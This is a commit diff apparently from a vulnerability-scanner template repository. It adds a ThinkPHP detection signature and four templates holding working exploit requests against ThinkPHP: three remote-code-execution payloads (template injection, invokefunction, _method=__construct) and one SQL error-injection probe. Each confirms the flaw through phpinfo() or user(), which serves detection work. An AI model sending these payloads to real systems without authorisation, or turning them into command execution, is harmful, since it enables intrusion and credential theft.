Added ThinkPHP templates and signature.
parent
4b13b7a485
commit
58ebf59035
|
@ -2747,3 +2747,10 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- 'Server: monit'
|
||||
|
||||
- type: word
|
||||
name: thinkphp
|
||||
words:
|
||||
- "ThinkPHP"
|
||||
part: header
|
||||
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: thinkphp-2-rce
|
||||
|
||||
info:
|
||||
name: ThinkPHP 5.0.22 RCE
|
||||
author: dr_set
|
||||
severity: critical
|
||||
description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
|
||||
|
||||
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: thinkphp-5022-rce
|
||||
|
||||
info:
|
||||
name: ThinkPHP 5.0.22 RCE
|
||||
author: dr_set
|
||||
severity: critical
|
||||
description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
|
||||
|
||||
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: thinkphp-5023-rce
|
||||
|
||||
info:
|
||||
name: ThinkPHP 5.0.23 RCE
|
||||
author: dr_set
|
||||
severity: critical
|
||||
description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
|
||||
|
||||
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?s=captcha"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: thinkphp-509-information-disclosure
|
||||
|
||||
info:
|
||||
name: ThinkPHP 5.0.9 Information Disclosure
|
||||
author: dr_set
|
||||
severity: critical
|
||||
description: Verbose SQL error message reveals sensitive information including database credentials.
|
||||
|
||||
# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SQLSTATE"
|
||||
- "XPATH syntax error"
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
Loading…
Reference in New Issue